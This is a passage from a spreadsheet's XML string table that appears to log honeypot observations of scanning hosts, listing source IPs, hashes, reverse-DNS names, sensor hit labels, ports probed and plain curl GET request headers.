    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:3f30</t>
  </si>
  <si>
    <t>f7b2be2785ff879db36581af50fff619</t>
  </si>
  <si>
    <t>49.213.188.133</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;23&amp;&amp;80&amp;&amp;61051&amp;&amp;43503&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:31d5:bc85</t>
  </si>
  <si>
    <t>20a0c695134b7479f27243e3d7efc4fc</t>
  </si>
  <si>
    <t>125.228.29.90</t>
  </si>
  <si>
    <t>125-228-29-90.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;NA&amp;&amp;23&amp;&amp;5020&amp;&amp;30896&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:7de4:1d5a</t>
  </si>
  <si>
    <t>a7a0dc141b8945bb3318c4944442a696</t>
  </si>
  <si>
    <t>220.135.130.178</t>
  </si>
  <si>
    <t>220-135-130-178.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H25</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;26382&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;48788&amp;&amp;32657</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc87:82b2</t>
  </si>
  <si>
    <t>e5b4a81a23e65af49fe299b3fe1c5bb1</t>
  </si>
  <si>
    <t>59.126.62.141</t>
  </si>
  <si>
    <t>59-126-62-141.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_DNS_H36&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H12</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;53&amp;&amp;40374&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:3e8d</t>
  </si>
  <si>
    <t>728697124b6b1c90afc26e07c8a74549</t>
  </si>
  <si>
    <t>59.126.39.217</t>
  </si>
  <si>
    <t>59-126-39-217.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H41</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;30209&amp;&amp;23&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:27d9</t>
  </si>
  <si>
    <t>300aa502e7397dc379b5b5278967b718</t>
  </si>
  <si>
    <t>59.126.254.199</t>
  </si>
  <si>
    <t>59-126-254-199.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H10</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21860&amp;&amp;23&amp;&amp;48050&amp;&amp;36152&amp;&amp;36166&amp;&amp;36182&amp;&amp;36200&amp;&amp;36213&amp;&amp;9100&amp;&amp;80&amp;&amp;33060</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:fec7</t>
  </si>
  <si>
    <t>96d793ddc63885975c0bae058ffff62a</t>
  </si>
  <si>
    <t>117.214.4.180</t>
  </si>
  <si>
    <t>::ffff:75d6:4b4</t>
  </si>
  <si>
    <t>4b91f2de1ea98806bc90e8f5d20589bd</t>
  </si>
  <si>
    <t>114.34.192.249</t>
  </si>
  <si>
    <t>114-34-192-249.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_SSH_H9&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7222:c0f9</t>
  </si>
  <si>
    <t>2ef9dc6c8ed90b72d62a867deb7cd411</t>
  </si>
  <si>
    <t>117.245.202.252</t>
  </si>
  <si>
    <t>::ffff:75f5:cafc</t>
  </si>
  <si>
    <t>da8fa1b355f3ca805efa2e47d7f0e9b6</t>
  </si>
  <si>
    <t>27.255.132.5</t>
  </si>
  <si>
    <t>::ffff:1bff:8405</t>
  </si>
  <si>
    <t>07a293f55efb5cbeb239f324cccf4a91</t>
  </si>
  <si>
    <t>59.126.254.42</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-126-254-42.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;36571&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:fe2a</t>
  </si>
  <si>
    <t>d64e81c546a3558191fd47e835d78598</t>
  </si>
  <si>
    <t>59.92.177.210</t>
  </si>
  <si>
    <t>::ffff:3b5c:b1d2</t>
  </si>
  <si>
    <t>7b73d30b2011796acaeab68b4412f3df</t>
  </si>
  <si>
    <t>117.207.49.249</t>
  </si>
  <si>
    <t>29207&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:75cf:31f9</t>
  </si>
  <si>
    <t>2a6ec3fccf599134afeccd2ff0eb8fbc</t>
  </si>
  <si>
    <t>220.132.62.167</t>
  </si>
  <si>
    <t>220-132-62-167.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;23630&amp;&amp;39394</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc84:3ea7</t>
  </si>
  <si>
    <t>91de77e60ab3ebf7ffe69021a8e3e7ee</t>
  </si>
  <si>
    <t>125.228.32.47</t>
  </si>
  <si>
    <t>125-228-32-47.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H35</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;64492&amp;&amp;23&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de4:202f</t>
  </si>
  <si>
    <t>769a3a576ef25570c57af42143e1b3c3</t>
  </si>
  <si>
    <t>59.126.119.22</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-126-119-22.hinet-ip.hinet.net</t>
  </si>
  <si>
